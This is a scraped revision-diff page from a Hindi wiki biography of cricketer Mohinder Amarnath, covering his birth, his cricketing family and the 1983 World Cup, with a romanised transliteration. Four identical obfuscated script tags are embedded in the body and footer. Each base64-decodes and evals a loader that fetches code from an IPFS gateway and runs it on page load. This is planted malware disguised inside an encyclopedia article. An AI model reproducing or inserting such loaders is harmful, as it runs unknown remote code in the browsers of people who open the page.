Difference between revisions of "मोहिन्दर अमरनाथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''मोहिन्दर अमरनाथ भारद्वाज''' (अंग्रेज़ी: ''Mohinder Amarnath Bhardwaj...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''मोहिन्दर अमरनाथ भारद्वाज''' ([[अंग्रेज़ी]]: ''Mohinder Amarnath Bhardwaj'' ; जन्म- [[24 सितम्बर]], [[1950]], [[पटियाला]], [[पंजाब]]) [[भारत]] के ख्यातिप्राप्त पूर्व क्रिकेटरों ([[1969]]-[[1989]]) में से एक हैं। वर्तमान समय वे [[क्रिकेट]] जैसे लोकप्रिय खेल के विश्लेषक हैं। मोहिन्दर अमरनाथ 'जिम्मी' के नाम से भी जाने जाते हैं। अपने समय के तेज़ गेंदबाजों का सामना करने में मोहिन्दर अमरनाथ सबसे माहिर माने जाते थे। वे भारत के प्रथम कप्तान लाला [[अमरनाथ]] के पुत्र हैं। इनके भाई सुरिन्दर अमरनाथ [[टेस्ट क्रिकेट]] खिलाड़ी और राजिन्दर अमरनाथ प्रथम श्रेणी क्रिकेट के खिलाड़ी रहे हैं। मोहिन्दर अमरनाथ [[वर्ष]] [[1983]] में भारत की पहली विश्व कप जीत के नायक थे।
+
'''मोहिन्दर अमरनाथ भारद्वाज''' ([[अंग्रेज़ी]]: ''Mohinder Amarnath Bhardwaj'' ; जन्म- [[24 सितम्बर]], [[1950]], [[पटियाला]], [[पंजाब]]) [[भारत]] के ख्यातिप्राप्त पूर्व क्रिकेटरों ([[1969]]-[[1989]]) में से एक हैं। वर्तमान समय वे [[क्रिकेट]] जैसे लोकप्रिय खेल के विश्लेषक हैं। मोहिन्दर अमरनाथ 'जिम्मी' के नाम से भी जाने जाते हैं। अपने समय के तेज़ गेंदबाजों का सामना करने में मोहिन्दर अमरनाथ सबसे माहिर माने जाते थे। वे भारत के प्रथम कप्तान लाला अमरनाथ के पुत्र हैं। इनके भाई सुरिन्दर अमरनाथ [[टेस्ट क्रिकेट]] खिलाड़ी और राजिन्दर अमरनाथ प्रथम श्रेणी क्रिकेट के खिलाड़ी रहे हैं। मोहिन्दर अमरनाथ [[वर्ष]] [[1983]] में भारत की पहली विश्व कप जीत के नायक थे।
 +
==जन्म==
 +
मोहिन्दर अमरनाथ का जन्म 24 सितम्बर, 1950 को [[पंजाब|पंजाब राज्य]] के [[पटियाला ज़िला|पटियाला ज़िले]] में हुआ था। इनके [[पिता]] [[भारत]] के प्रसिद्ध [[क्रिकेट]] खिलाड़ी लाला अमरनाथ थे।
 +
==पारिवारिक पृष्ठभूमि==
 +
भारत के लिये पहला टेस्ट शतक जमाने वाले लाला अमरनाथ भारतीय क्रिकेट के महानतम खिलाडि़यों में से एक थे। लाला अमरनाथ के बाद उनके बड़े बेटे सुरिन्दर अमरनाथ ने भारतीय स्कूली लड़कों की टेस्ट टीम की कप्तानी की और बाद में अपने पिता की तरह पहले टेस्ट में शतक बनाया। दोनों के नाम पहले ही टेस्ट में शतक जमाने का रिकार्ड है। बाद में मोहिन्दर अमरनाथ ने क्रिकेट में पदार्पण किया, जो [[1983]] में भारत की पहली विश्व कप जीत के नायक रहे। अब अमरनाथ परिवार की तीसरी पीढ़ी भी क्रिकेट के मैदान पर उतर चुकी है, जब सुरिन्दर अमरनाथ के 22 वर्ष के बेटे दिग्विजय अमरनाथ ने प्रथम श्रेणी क्रिकेट में पदार्पण किया।<ref>{{cite web |url= http://www.p7news.tv/sports/7603-amarnath-family-s-third-generation-makes-debut-in-cricket.html|title= अमरनाथ परिवार की तीसरी पीढ़ी का क्रिकेट में पदार्पण|accessmonthday= 24 सितम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher= पी-7 न्यूज|language= हिन्दी}}</ref>
  
  

Revision as of 08:34, 24 September 2014

mohindar amaranath bharadvaj (aangrezi: Mohinder Amarnath Bhardwaj ; janm- 24 sitambar, 1950, patiyala, panjab) bharat ke khyatiprapt poorv kriketaroan (1969-1989) mean se ek haian. vartaman samay ve kriket jaise lokapriy khel ke vishleshak haian. mohindar amaranath 'jimmi' ke nam se bhi jane jate haian. apane samay ke tez geandabajoan ka samana karane mean mohindar amaranath sabase mahir mane jate the. ve bharat ke pratham kaptan lala amaranath ke putr haian. inake bhaee surindar amaranath test kriket khila di aur rajindar amaranath pratham shreni kriket ke khila di rahe haian. mohindar amaranath varsh 1983 mean bharat ki pahali vishv kap jit ke nayak the.

janm

mohindar amaranath ka janm 24 sitambar, 1950 ko panjab rajy ke patiyala zile mean hua tha. inake pita bharat ke prasiddh kriket khila di lala amaranath the.

parivarik prishthabhoomi

bharat ke liye pahala test shatak jamane vale lala amaranath bharatiy kriket ke mahanatam khiladi़yoan mean se ek the. lala amaranath ke bad unake b de bete surindar amaranath ne bharatiy skooli l dakoan ki test tim ki kaptani ki aur bad mean apane pita ki tarah pahale test mean shatak banaya. donoan ke nam pahale hi test mean shatak jamane ka rikard hai. bad mean mohindar amaranath ne kriket mean padarpan kiya, jo 1983 mean bharat ki pahali vishv kap jit ke nayak rahe. ab amaranath parivar ki tisari pidhi bhi kriket ke maidan par utar chuki hai, jab surindar amaranath ke 22 varsh ke bete digvijay amaranath ne pratham shreni kriket mean padarpan kiya.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. amaranath parivar ki tisari pidhi ka kriket mean padarpan (hindi) pi-7 nyooj. abhigaman tithi: 24 sitambar, 2014.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>